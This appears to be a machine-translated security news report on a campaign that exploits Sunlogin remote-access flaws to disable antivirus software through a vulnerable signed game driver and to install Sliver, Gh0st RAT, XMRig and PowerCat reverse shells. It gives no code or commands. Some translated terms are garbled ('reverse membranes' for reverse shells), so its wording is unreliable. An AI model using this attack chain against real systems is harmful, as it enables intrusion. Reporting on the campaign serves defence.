The new hacker campaign uses the vulnerabilities of the Sunlogin remote access program to deploy the Sliver post-ethro tools and the BYOVD attacks to turn off antivirus products.
Sliver is a tool for post -ethnication, created by Bishopfox, which attackers began to use as an alternative to Cobalt Strike last summer. They use it for network observation, commands, loading DLLs, creating sessions, manipulating processes, etc.
according to the report AHNLAB (ASEC) Emergency Safety situations, recently identified attacks were aimed at two vulnerabilities, Found in the software for remote access Sunlogin.
Attackers use these vulnerabilities to compromise the device, and then perform PowerShell scripts to launch the reverse membranes or install other useful loads such as Sliver, GH0ST RAT or XMRIG MONERO.
Teams supported by Sliver
The attack begins with the use of vulnerabilities CNVD-2022-10270 / CNVD-2022-03672, relevant in the Sunlogin version 11.0.0.33 and earlier versions. Attackers use vulnerabilities to perform a focused PowerShell script and disable antivirus systems before the deployment of backdors.
The script decodes the transferred .net file and downloads it into memory. This executable file is a modified version of the open source code MhyProt2DrvControl, created to use vulnerable Windows drivers.
Mhyprot2drvcontlo operates Mhyprot2.Sys, an antitheld drive with a digital signature of the Chinese game Genshin Impact. This driver, according to Trend Micro, was used for extortionists from last year.
”The developer Mhyprot2drvControl has provided many functions that can be used with increased privileges MhyProt2.Sys. Among them, for example, a function that allows you to force the processes of antiviral programs, which is very useful for developing malicious software,” ASEC specialists explain in their report .
The second part of the PowerShell script loads PowerCat from an external source and uses it to launch the reverse membrane, which connects to the C2 server, providing the attacker with remote access to a hacked device.
In some cases, the attack was followed by the installation of the Sliver implant (“ACL.exe”). The attackers also installed GH0ST RAT for remote file management, registration of keys, deleted commands and data exploration possibilities.
Microsoft recommends Windows administrators to include a list of vulnerable drivers locks to protect against BYOVD attacks. How to do this is described in detail in this article support for the Redmond Corporation.